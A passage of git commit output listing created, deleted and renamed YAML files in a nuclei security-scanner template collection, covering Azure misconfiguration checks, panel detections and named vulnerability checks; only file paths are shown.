nuclei-templates/Other/azure-functionapp-public-exposure.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-system-assigned-missing.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-user-assigned-id-missing.yaml create mode 100644 nuclei-templates/Other/azure-functionapp-vnet-integration-missing.yaml create mode 100644 nuclei-templates/Other/azure-iam-role-resource-lock-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-key-vault-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-audit-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-cert-keytype-unapproved.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-cert-transparency-missing.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-certificate-insufficient-autorenew.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-network-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-recoverability-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-resource-lock-check.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-ssl-autorenewal-missing.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-trusted-ms-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-keyvault-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-lb-create-update-missing.yaml create mode 100644 nuclei-templates/Other/azure-lb-unused.yaml create mode 100644 nuclei-templates/Other/azure-log-profile-all-activities.yaml create mode 100644 nuclei-templates/Other/azure-mfa-not-enabled-privileged-users.yaml create mode 100644 nuclei-templates/Other/azure-monitor-diagnostic-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-mysql-db-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-network-watcher.yaml create mode 100644 nuclei-templates/Other/azure-nic-ip-forwarding-check.yaml create mode 100644 nuclei-templates/Other/azure-nsg-create-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-nsg-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-nsg-rule-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-nsg-rule-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-openai-cmk-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-openai-managed-identity-not-used.yaml create mode 100644 nuclei-templates/Other/azure-openai-private-endpoints-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-openai-public-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-policy-assignment-create-alert-missing.yaml create mode 100644 nuclei-templates/Other/azure-policy-assignment-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-policy-not-allowed-types-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-postgres-allow-azure-services-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-connection-throttling-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-double-encryption-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-log-checkpoints-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-log-connections-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-log-disconnections-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgres-log-duration-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-db-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-db-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-geo-backup-disabled.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-ssl-enforcement.yaml create mode 100644 nuclei-templates/Other/azure-postgresql-storage-autogrow-disabled.yaml create mode 100644 nuclei-templates/Other/azure-public-ip-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-public-ip-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-redis-nonssl-port-disabled.yaml create mode 100644 nuclei-templates/Other/azure-redis-tls-version-outdated.yaml create mode 100644 nuclei-templates/Other/azure-search-service-managed-identity-disabled.yaml create mode 100644 nuclei-templates/Other/azure-security-policy-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-security-solution-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-security-solutions-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-servicebus-public-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-servicebus-tls-version-outdated.yaml create mode 100644 nuclei-templates/Other/azure-sql-auditing-disabled.yaml create mode 100644 nuclei-templates/Other/azure-sql-database-rename-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-sql-db-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-sql-delete-db-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-sql-failover-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-sql-fw-rule-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-sql-mi-tde-cmk-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-sql-mi-tls-version-outdated.yaml create mode 100644 nuclei-templates/Other/azure-sql-tde-cmk-not-used.yaml create mode 100644 nuclei-templates/Other/azure-sql-tde-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-sql-va-emails-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-storage-account-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-storage-account-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-storage-blob-public-access.yaml create mode 100644 nuclei-templates/Other/azure-storage-byok-not-used.yaml create mode 100644 nuclei-templates/Other/azure-storage-cmk-not-used.yaml create mode 100644 nuclei-templates/Other/azure-storage-cross-tenant-replication-disabled.yaml create mode 100644 nuclei-templates/Other/azure-storage-encryption-missing.yaml create mode 100644 nuclei-templates/Other/azure-storage-min-tls-version.yaml create mode 100644 nuclei-templates/Other/azure-storage-network-unrestricted.yaml create mode 100644 nuclei-templates/Other/azure-storage-overly-permissive-sap.yaml create mode 100644 nuclei-templates/Other/azure-storage-private-endpoint-unconfigured.yaml create mode 100644 nuclei-templates/Other/azure-storage-public-access.yaml create mode 100644 nuclei-templates/Other/azure-storage-queue-logging-disabled.yaml create mode 100644 nuclei-templates/Other/azure-storage-secure-transfer.yaml create mode 100644 nuclei-templates/Other/azure-storage-static-website-review.yaml create mode 100644 nuclei-templates/Other/azure-storage-table-logging-disabled.yaml create mode 100644 nuclei-templates/Other/azure-storage-trusted-access-disabled.yaml create mode 100644 nuclei-templates/Other/azure-synapse-sqlpool-tde-disabled.yaml create mode 100644 nuclei-templates/Other/azure-takeover-detection-681.yaml delete mode 100644 nuclei-templates/Other/azure-takeover-detection-683.yaml create mode 100644 nuclei-templates/Other/azure-vm-accelerated-networking-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-accelerated-networking-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-boot-diagnostics-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-boot-disk-unencrypted.yaml create mode 100644 nuclei-templates/Other/azure-vm-byok-disk-volumes-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-create-update-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-vm-deallocate-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-vm-delete-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-vm-endpoint-protection-missing.yaml create mode 100644 nuclei-templates/Other/azure-vm-entra-id-unenabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-guest-diagnostics-unenabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-jit-access-not-enabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-managed-identity-unassigned.yaml create mode 100644 nuclei-templates/Other/azure-vm-performance-diagnostics-unenabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-poweroff-unalerted.yaml create mode 100644 nuclei-templates/Other/azure-vm-ssh-auth-type.yaml create mode 100644 nuclei-templates/Other/azure-vm-standard-ssd-required.yaml create mode 100644 nuclei-templates/Other/azure-vm-tags-schema-noncompliant.yaml create mode 100644 nuclei-templates/Other/azure-vm-trusted-launch-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vm-unapproved-image.yaml create mode 100644 nuclei-templates/Other/azure-vm-unmanaged-disk-volumes.yaml create mode 100644 nuclei-templates/Other/azure-vm-web-tier-disk-unencrypted.yaml create mode 100644 nuclei-templates/Other/azure-vmss-auto-os-upgrade-missing.yaml create mode 100644 nuclei-templates/Other/azure-vmss-auto-repairs-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vmss-empty-unattached.yaml create mode 100644 nuclei-templates/Other/azure-vmss-health-monitoring-missing.yaml create mode 100644 nuclei-templates/Other/azure-vmss-load-balancer-unassociated.yaml create mode 100644 nuclei-templates/Other/azure-vmss-public-ip-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vmss-termination-notif-disabled.yaml create mode 100644 nuclei-templates/Other/azure-vmss-zone-redundancy-missing.yaml create mode 100644 nuclei-templates/Other/azure-vnet-ddos-protection.yaml create mode 100644 nuclei-templates/Other/bagisto.yaml rename nuclei-templates/Other/{barracuda-panel-684.yaml => barracuda-panel-686.yaml} (100%) rename nuclei-templates/Other/{bash.yaml => bash-scanner.yaml} (100%) rename nuclei-templates/Other/{basic-auth-detection.yaml => basic-auth-detection-687.yaml} (100%) delete mode 100644 nuclei-templates/Other/basic-xss-prober-695.yaml create mode 100644 nuclei-templates/Other/basic-xss-prober-698.yaml create mode 100644 nuclei-templates/Other/bazarr-login-703.yaml delete mode 100644 nuclei-templates/Other/bazarr-login.yaml create mode 100644 nuclei-templates/Other/beauty.yaml create mode 100644 nuclei-templates/Other/bems-api-lfi-709.yaml delete mode 100644 nuclei-templates/Other/bems-api-lfi-710.yaml rename nuclei-templates/Other/{beward-ipcamera-disclosure-717.yaml => beward-ipcamera-disclosure-715.yaml} (100%) rename nuclei-templates/Other/{bigbluebutton-login-724.yaml => bigbluebutton-login-725.yaml} (100%) delete mode 100644 nuclei-templates/Other/bigip-config-utility-detect-730.yaml create mode 100644 nuclei-templates/Other/bigip-config-utility-detect-733.yaml rename nuclei-templates/Other/{bigip-detection-735.yaml => bigip-detection.yaml} (100%) rename nuclei-templates/Other/{biometric-detect-736.yaml => biometric-detect-737.yaml} (100%) delete mode 100644 nuclei-templates/Other/bitbucket-takeover-738.yaml create mode 100644 nuclei-templates/Other/bitbucket-takeover-741.yaml create mode 100644 nuclei-templates/Other/bitrix-open-redirect-745.yaml delete mode 100644 nuclei-templates/Other/bitrix-open-redirect.yaml create mode 100644 nuclei-templates/Other/bitrix-panel-748.yaml delete mode 100644 nuclei-templates/Other/bitrix-panel-750.yaml delete mode 100644 nuclei-templates/Other/blind-oast-polyglots.yaml delete mode 100644 nuclei-templates/Other/blue-ocean-excellence-lfi-756.yaml create mode 100644 nuclei-templates/Other/blue-ocean-excellence-lfi.yaml create mode 100644 nuclei-templates/Other/bolt-cms-panel-762.yaml delete mode 100644 nuclei-templates/Other/bolt-cms-panel-763.yaml delete mode 100644 nuclei-templates/Other/bookstack-detect-765.yaml create mode 100644 nuclei-templates/Other/bookstack-detect.yaml delete mode 100755 nuclei-templates/Other/braintree-access-token-771.yaml create mode 100644 nuclei-templates/Other/braintree-access-token.yaml create mode 100644 nuclei-templates/Other/branch-key-774.yaml delete mode 100644 nuclei-templates/Other/branch-key.yaml create mode 100644 nuclei-templates/Other/brandfolder-lfi-776.yaml delete mode 100644 nuclei-templates/Other/brandfolder-lfi.yaml delete mode 100644 nuclei-templates/Other/brightcove-takeover-783.yaml create mode 100644 nuclei-templates/Other/brightcove-takeover-784.yaml delete mode 100644 nuclei-templates/Other/brother-printer-detect-788.yaml create mode 100644 nuclei-templates/Other/brother-printer-detect-789.yaml rename nuclei-templates/Other/{brother-unauthorized-access.yaml => brother-unauthorized-access-792.yaml} (100%) rename nuclei-templates/Other/{browserless-debugger.yaml => browserless-debugger-794.yaml} (100%) create mode 100644 nuclei-templates/Other/buddy-panel-796.yaml delete mode 100644 nuclei-templates/Other/buddy-panel.yaml rename nuclei-templates/Other/{buffalo-config-injection-801.yaml => buffalo-config-injection-798.yaml} (100%) rename nuclei-templates/Other/{buildbot-panel-802.yaml => buildbot-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/businessintelligence-default-login-814.yaml create mode 100644 nuclei-templates/Other/businessintelligence-default-login-817.yaml rename nuclei-templates/Other/{api-buttercms-403.yaml => buttercms.yaml} (100%) delete mode 100644 nuclei-templates/Other/cab-fare-calculator-lfi-818.yaml create mode 100644 nuclei-templates/Other/cab-fare-calculator-lfi-819.yaml create mode 100644 nuclei-templates/Other/cache-poisoning-823.yaml delete mode 100644 nuclei-templates/Other/cache-poisoning-825.yaml create mode 100644 nuclei-templates/Other/cacti-panel-828.yaml delete mode 100644 nuclei-templates/Other/cacti-panel-829.yaml delete mode 100644 nuclei-templates/Other/cacti-weathermap-file-write-832.yaml create mode 100644 nuclei-templates/Other/cacti-weathermap-file-write.yaml create mode 100644 nuclei-templates/Other/caddy-open-redirect-837.yaml delete mode 100644 nuclei-templates/Other/caddy-open-redirect.yaml create mode 100644 nuclei-templates/Other/calibre.yaml create mode 100644 nuclei-templates/Other/call-break-cms-840.yaml delete mode 100644 nuclei-templates/Other/call-break-cms.yaml create mode 100644 nuclei-templates/Other/camera_firmware.yaml create mode 100644 nuclei-templates/Other/campaignmonitor-843.yaml delete mode 100644 nuclei-templates/Other/campaignmonitor.yaml rename nuclei-templates/Other/{camunda-login-panel-845.yaml => camunda-login-panel.yaml} (100%) delete mode 100644 nuclei-templates/Other/canal-default-login-846.yaml create mode 100644 nuclei-templates/Other/canal-default-login.yaml create mode 100644 nuclei-templates/Other/canny-takeover-854.yaml delete mode 100644 nuclei-templates/Other/canny-takeover-857.yaml rename nuclei-templates/Other/{cargo-takeover-867.yaml => cargo-takeover-869.yaml} (100%) create mode 100644 nuclei-templates/Other/cargocollective-takeover-864.yaml delete mode 100644 nuclei-templates/Other/cargocollective-takeover-865.yaml create mode 100644 nuclei-templates/Other/cdg.yaml rename nuclei-templates/Other/{3833918288.yaml => ceph.yaml} (100%) create mode 100644 nuclei-templates/Other/cercopitheque.yaml create mode 100644 nuclei-templates/Other/cerebro-panel-878.yaml delete mode 100644 nuclei-templates/Other/cerebro-panel-881.yaml rename nuclei-templates/Other/{certificate-validation-882.yaml => certificate-validation-883.yaml} (100%) delete mode 100644 nuclei-templates/Other/cgi-printenv-886.yaml create mode 100644 nuclei-templates/Other/cgi-printenv.yaml delete mode 100644 nuclei-templates/Other/cgi-test-page-888.yaml create mode 100644 nuclei-templates/Other/cgi-test-page-890.yaml rename nuclei-templates/Other/{chamilo-lms-xss.yaml => chamilo-lms-xss-893.yaml} (100%) rename nuclei-templates/Other/{chanjet-CRM-sqli.yaml => chanjet-crm-sqli.yaml} (100%) create mode 100644 nuclei-templates/Other/chatgpt_web.yaml create mode 100644 nuclei-templates/Other/checkmarx-panel-897.yaml delete mode 100644 nuclei-templates/Other/checkmarx-panel.yaml rename nuclei-templates/Other/{checkpoint-panel-899.yaml => checkpoint-panel-898.yaml} (100%) delete mode 100644 nuclei-templates/Other/cherry-file-download-900.yaml create mode 100644 nuclei-templates/Other/cherry-file-download.yaml delete mode 100644 nuclei-templates/Other/church-admin-lfi-914.yaml create mode 100644 nuclei-templates/Other/church-admin-lfi.yaml delete mode 100644 nuclei-templates/Other/circarlife-setup-917.yaml create mode 100644 nuclei-templates/Other/circarlife-setup-921.yaml delete mode 100644 nuclei-templates/Other/circleci-config-923.yaml create mode 100644 nuclei-templates/Other/circleci-config-924.yaml delete mode 100644 nuclei-templates/Other/circleci-ssh-config-927.yaml create mode 100644 nuclei-templates/Other/circleci-ssh-config-928.yaml rename nuclei-templates/Other/{api-circleci.yaml => circleci.yaml} (100%) rename nuclei-templates/Other/{cisco-finesse-login-940.yaml => cisco-finesse-login.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-meraki-exposure-944.yaml delete mode 100644 nuclei-templates/Other/cisco-meraki-exposure-946.yaml create mode 100644 nuclei-templates/Other/cisco-sd-wan-957.yaml delete mode 100644 nuclei-templates/Other/cisco-sd-wan.yaml rename nuclei-templates/Other/{cisco-security-details-963.yaml => cisco-security-details.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-sendgrid-968.yaml delete mode 100644 nuclei-templates/Other/cisco-sendgrid-969.yaml delete mode 100644 nuclei-templates/Other/cisco-smi-exposure-970.yaml create mode 100644 nuclei-templates/Other/cisco-smi-exposure-971.yaml rename nuclei-templates/Other/{cisco-systems-login-975.yaml => cisco-systems-login.yaml} (100%) create mode 100644 nuclei-templates/Other/cisco-ucs-kvm-login-979.yaml delete mode 100644 nuclei-templates/Other/cisco-ucs-kvm-login.yaml rename nuclei-templates/Other/{citrix-adc-gateway-detect-983.yaml => citrix-adc-gateway-detect-981.yaml} (100%) rename nuclei-templates/Other/{ckan-dom-based-xss.yaml => ckan-dom-based-xss-993.yaml} (100%) create mode 100644 nuclei-templates/Other/ckan.yaml rename nuclei-templates/Other/{CL-TE-http-smuggling.yaml => cl-te-http-smuggling.yaml} (100%) rename nuclei-templates/Other/{clearpass-policy-manager-997.yaml => clearpass-policy-manager-1001.yaml} (100%) delete mode 100644 nuclei-templates/Other/clickhouse-unauth-1002.yaml create mode 100644 nuclei-templates/Other/clickhouse-unauth-1003.yaml create mode 100644 nuclei-templates/Other/clickshare_cs-100_huddle_firmware.yaml rename nuclei-templates/Other/{clientaccesspolicy-1005.yaml => clientaccesspolicy-1006.yaml} (100%) delete mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure-1012.yaml create mode 100644 nuclei-templates/Other/clockwork-dashboard-exposure-1015.yaml delete mode 100644 nuclei-templates/Other/clockwork-php-page-1018.yaml create mode 100644 nuclei-templates/Other/clockwork-php-page-1019.yaml create mode 100644 nuclei-templates/Other/cloud_foundation.yaml rename nuclei-templates/Other/{cloudflare-image-ssrf-1023.yaml => cloudflare-image-ssrf-1022.yaml} (100%) create mode 100644 nuclei-templates/Other/cloudstack.yaml rename nuclei-templates/Other/{cname-service-detection.yaml => cname-service-detection-1032.yaml} (100%) delete mode 100644 nuclei-templates/Other/cname-service-detector-1033.yaml create mode 100644 nuclei-templates/Other/cname-service-detector-1034.yaml delete mode 100644 nuclei-templates/Other/cnnvd-200705-315-1035.yaml rename nuclei-templates/Other/{cnvd-2019-06255-1050.yaml => cnvd-2019-06255-1046.yaml} (100%) delete mode 100644 nuclei-templates/Other/cnvd-2019-19299-1051.yaml delete mode 100644 nuclei-templates/Other/cnvd-2020-23735-1058.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-46552-1060.yaml rename nuclei-templates/Other/{CNVD-2020-56167.yaml => cnvd-2020-56167-1061.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2020-67113-1071.yaml create mode 100644 nuclei-templates/Other/cnvd-2020-68596-1075.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-01931-1077.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-10543-1084.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-14536-1087.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-15822-1095.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-15824-1097.yaml create mode 100644 nuclei-templates/Other/cnvd-2021-17369-1098.yaml rename nuclei-templates/Other/{CNVD-2021-28277.yaml => cnvd-2021-28277-1105.yaml} (100%) create mode 100644 nuclei-templates/Other/cnvd-2021-30167-1110.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-30167-1112.yaml delete mode 100644 nuclei-templates/Other/cnvd-2021-49104-1115.yaml rename nuclei-templates/Other/{cockpit-workflow-1129.yaml => cockpit-workflow.yaml} (100%) create mode 100644 nuclei-templates/Other/code42-log4j-rce-1131.yaml delete mode 100644 nuclei-templates/Other/code42-log4j-rce.yaml create mode 100644 nuclei-templates/Other/codeigniter-env-1134.yaml delete mode 100644 nuclei-templates/Other/codeigniter-env.yaml create mode 100644 nuclei-templates/Other/cofense-vision-detection.yaml delete mode 100644 nuclei-templates/Other/cofense-vision-panel.yaml rename nuclei-templates/Other/{cold-fusion-cfcache-map-1149.yaml => cold-fusion-cfcache-map.yaml} (100%) create mode 100644 nuclei-templates/Other/coldfusion-administrator-login-1146.yaml delete mode 100644 nuclei-templates/Other/coldfusion-administrator-login.yaml create mode 100644 nuclei-templates/Other/coldfusion-debug-xss-1154.yaml delete mode 100644 nuclei-templates/Other/coldfusion-debug-xss-1155.yaml create mode 100644 nuclei-templates/Other/commax-credentials-disclosure-1160.yaml delete mode 100644 nuclei-templates/Other/commax-credentials-disclosure.yaml delete mode 100644 nuclei-templates/Other/compal-panel.yaml create mode 100644 nuclei-templates/Other/compal.yaml delete mode 100644 nuclei-templates/Other/comtrend-password-exposure-1168.yaml create mode 100644 nuclei-templates/Other/comtrend-password-exposure.yaml delete mode 100644 nuclei-templates/Other/concourse-ci-panel-1170.yaml create mode 100644 nuclei-templates/Other/concourse-ci-panel.yaml rename nuclei-templates/Other/{concrete-xss-1176.yaml => concrete-xss-1177.yaml} (100%) rename nuclei-templates/Other/{configuration-listing-1182.yaml => configuration-listing-1184.yaml} (100%) rename nuclei-templates/Other/{confluence-detect.yaml => confluence-detect-1186.yaml} (100%) create mode 100644 nuclei-templates/Other/confluence-ssrf-sharelinks-1191.yaml delete mode 100644 nuclei-templates/Other/confluence-ssrf-sharelinks-1192.yaml create mode 100644 nuclei-templates/Other/connection_broker.yaml delete mode 100644 nuclei-templates/Other/contact-form-7-plugin.yaml create mode 100644 nuclei-templates/Other/contact-form-7.yaml delete mode 100644 nuclei-templates/Other/cookie-injection.yaml delete mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1210.yaml create mode 100644 nuclei-templates/Other/core-chuangtian-cloud-rce-1212.yaml create mode 100644 nuclei-templates/Other/coremail-config-disclosure-1215.yaml delete mode 100644 nuclei-templates/Other/coremail-config-disclosure.yaml rename nuclei-templates/Other/{cors-misconfig-1222.yaml => cors-misconfig-1221.yaml} (100%) delete mode 100644 nuclei-templates/Other/cortex-xsoar-login-1227.yaml create mode 100644 nuclei-templates/Other/cortex-xsoar-login-1229.yaml rename nuclei-templates/Other/{couchbase-buckets-api-1233.yaml => couchbase-buckets-api.yaml} (100%) delete mode 100644 nuclei-templates/Other/couchdb-adminparty-1234.yaml create mode 100644 nuclei-templates/Other/couchdb-adminparty-1237.yaml create mode 100644 nuclei-templates/Other/craft-cms-detect-1247.yaml delete mode 100644 nuclei-templates/Other/craft-cms-detect.yaml rename nuclei-templates/Other/{craftcms-admin-panel.yaml => craftcms-admin-panel-1245.yaml} (100%) delete mode 100644 nuclei-templates/Other/credentials-1257.yaml delete mode 100644 nuclei-templates/Other/credentials-disclosure-1252.yaml create mode 100644 nuclei-templates/Other/credentials-disclosure-1255.yaml create mode 100644 nuclei-templates/Other/credentials.yaml create mode 100644 nuclei-templates/Other/crmeb.yaml create mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi-1285.yaml delete mode 100644 nuclei-templates/Other/cs-cart-unauthenticated-lfi.yaml create mode 100644 nuclei-templates/Other/cs141.yaml rename nuclei-templates/Other/{csod-panel.yaml => csod-panel-1286.yaml} (100%) create mode 100644 nuclei-templates/Other/csrfguard-detect-1290.yaml delete mode 100644 nuclei-templates/Other/csrfguard-detect-1291.yaml create mode 100644 nuclei-templates/Other/custom-data-result-service-detect.yaml delete mode 100644 nuclei-templates/Other/custom-datadump-source-code-detect.yaml create mode 100644 nuclei-templates/Other/custom-post-limits.yaml delete mode 100644 nuclei-templates/Other/custom-solr-file-read.yaml delete mode 100644 nuclei-templates/Other/custom-swagger-ui-detect.yaml create mode 100644 nuclei-templates/Other/custom-xss-check.yaml delete mode 100644 nuclei-templates/Other/custom_nuclei-5.yaml create mode 100644 nuclei-templates/Other/custom_nuclei-8.yaml delete mode 100644 nuclei-templates/Other/d-link-arbitary-fileread-7044.yaml create mode 100644 nuclei-templates/Other/d-link-arbitary-fileread-7045.yaml delete mode 100644 nuclei-templates/Other/d-link-wireless-7050.yaml create mode 100644 nuclei-templates/Other/d-link-wireless.yaml create mode 100644 nuclei-templates/Other/data_science_studio.yaml rename nuclei-templates/Other/{database-error-6768.yaml => database-error-6771.yaml} (100%) create mode 100644 nuclei-templates/Other/dataease.yaml create mode 100644 nuclei-templates/Other/datahub.yaml delete mode 100644 nuclei-templates/Other/daybyday-detect-6772.yaml create mode 100644 nuclei-templates/Other/daybyday-detect.yaml create mode 100644 nuclei-templates/Other/db-backup-lfi-6776.yaml delete mode 100644 nuclei-templates/Other/db-backup-lfi.yaml rename nuclei-templates/Other/{dead-host-with-cname.yaml => dead-host-with-cname-6787.yaml} (100%) rename nuclei-templates/Other/{debug-enabled-6790.yaml => debug-enabled-6788.yaml} (100%) delete mode 100644 nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6793.yaml create mode 100644 nuclei-templates/Other/dedecms-carbuyaction-fileinclude-6794.yaml create mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli-6796.yaml delete mode 100644 nuclei-templates/Other/dedecms-membergroup-sqli.yaml rename nuclei-templates/Other/{dedecms-openredirect-6802.yaml => dedecms-openredirect-6803.yaml} (100%) rename nuclei-templates/Other/{default-apache-test-all.yaml => default-apache-test-all-6814.yaml} (100%) create mode 100644 nuclei-templates/Other/default-apache-test-page-6818.yaml delete mode 100644 nuclei-templates/Other/default-apache-test-page.yaml create mode 100644 nuclei-templates/Other/default-apache2-ubuntu-page-6809.yaml delete mode 100644 nuclei-templates/Other/default-apache2-ubuntu-page.yaml create mode 100644 nuclei-templates/Other/default-asp-net-page-6822.yaml delete mode 100644 nuclei-templates/Other/default-asp-net-page.yaml create mode 100644 nuclei-templates/Other/default-codeigniter-page-6833.yaml delete mode 100644 nuclei-templates/Other/default-codeigniter-page.yaml rename nuclei-templates/Other/{default-django-page.yaml => default-django-page-6842.yaml} (100%) rename nuclei-templates/Other/{default-fastcgi-page.yaml => default-fastcgi-page-6845.yaml} (100%) create mode 100644 nuclei-templates/Other/default-fedora-page-6848.yaml delete mode 100644 nuclei-templates/Other/default-fedora-page-6850.yaml create mode 100644 nuclei-templates/Other/default-glassfish-server-page-6854.yaml delete mode 100644 nuclei-templates/Other/default-glassfish-server-page.yaml create mode 100644 nuclei-templates/Other/default-ibm-http-server-6857.yaml create mode 100644 nuclei-templates/Other/default-jetty-page-6863.yaml delete mode 100644 nuclei-templates/Other/default-jetty-page.yaml delete mode 100644 nuclei-templates/Other/default-lighttpd-page.yaml rename nuclei-templates/Other/{default-microsoft-azure-page.yaml => default-microsoft-azure-page-6873.yaml} (100%) create mode 100644 nuclei-templates/Other/default-openresty-6884.yaml delete mode 100644 nuclei-templates/Other/default-openresty.yaml rename nuclei-templates/Other/{default-payara-server-page.yaml => default-payara-server-page-6895.yaml} (100%) create mode 100644 nuclei-templates/Other/default-plesk-page-6900.yaml delete mode 100644 nuclei-templates/Other/default-plesk-page.yaml create mode 100644 nuclei-templates/Other/default-tomcat-page-6911.yaml create mode 100644 nuclei-templates/Other/default-windows-server-page-6912.yaml delete mode 100644 nuclei-templates/Other/default-windows-server-page-6914.yaml create mode 100644 nuclei-templates/Other/delicate.yaml create mode 100644 nuclei-templates/Other/dell-emc-ecom-default-credentials.yaml delete mode 100644 nuclei-templates/Other/dell-idrac-default-login-6946.yaml create mode 100644 nuclei-templates/Other/dell-idrac-default-login.yaml delete mode 100644 nuclei-templates/Other/dell-idrac6-detect-6918.yaml create mode 100644 nuclei-templates/Other/dell-idrac6-detect-6919.yaml create mode 100644 nuclei-templates/Other/dell-idrac7-detect-6923.yaml delete mode 100644 nuclei-templates/Other/dell-idrac7-detect.yaml create mode 100644 nuclei-templates/Other/dell-idrac9-default-login-6933.yaml delete mode 100644 nuclei-templates/Other/dell-idrac9-default-login.yaml create mode 100644 nuclei-templates/Other/dell-idrac9-detect-6938.yaml delete mode 100644 nuclei-templates/Other/dell-idrac9-detect-6939.yaml create mode 100644 nuclei-templates/Other/dell-openmanager-login-6948.yaml delete mode 100644 nuclei-templates/Other/dell-openmanager-login.yaml rename nuclei-templates/Other/{dell-wyse-login-6952.yaml => dell-wyse-management-suite-login.yaml} (100%) delete mode 100644 nuclei-templates/Other/deprecated-tls-6958.yaml create mode 100644 nuclei-templates/Other/deprecated-tls.yaml delete mode 100644 nuclei-templates/Other/dericam-login-6962.yaml create mode 100644 nuclei-templates/Other/dericam-login.yaml rename nuclei-templates/Other/{detect-addpac-voip-gateway.yaml => detect-addpac-voip-gateway-6965.yaml} (100%) delete mode 100644 nuclei-templates/Other/detect-all-takeover.yaml delete mode 100644 nuclei-templates/Other/detect-dangling-cname-6966.yaml create mode 100644 nuclei-templates/Other/detect-dangling-cname.yaml rename nuclei-templates/Other/{detect-dns-over-https.yaml => detect-dns-over-https-6970.yaml} (100%) rename nuclei-templates/Other/{detect-options-method.yaml => detect-options-method-6976.yaml} (100%) delete mode 100644 nuclei-templates/Other/detect-rsyncd-6979.yaml create mode 100644 nuclei-templates/Other/detect-rsyncd-6981.yaml delete mode 100644 nuclei-templates/Other/detection-elasticsearch.yaml delete mode 100644 nuclei-templates/Other/detection-zookeeper.yaml rename nuclei-templates/Other/{development-logs.yaml => development-logs-6987.yaml} (100%) rename nuclei-templates/Other/{diaowen-fileread(1).yaml => diaowen-fileread.yaml} (100%) create mode 100644 nuclei-templates/Other/diarise-theme-lfi-6992.yaml delete mode 100644 nuclei-templates/Other/diarise-theme-lfi.yaml create mode 100644 nuclei-templates/Other/dicoogle-pacs-lfi-6993.yaml delete mode 100644 nuclei-templates/Other/dicoogle-pacs-lfi-6995.yaml rename nuclei-templates/Other/{Digital-Signage-rce.yaml => digital-signage-rce.yaml} (100%) create mode 100644 nuclei-templates/Other/dir-845l.yaml delete mode 100644 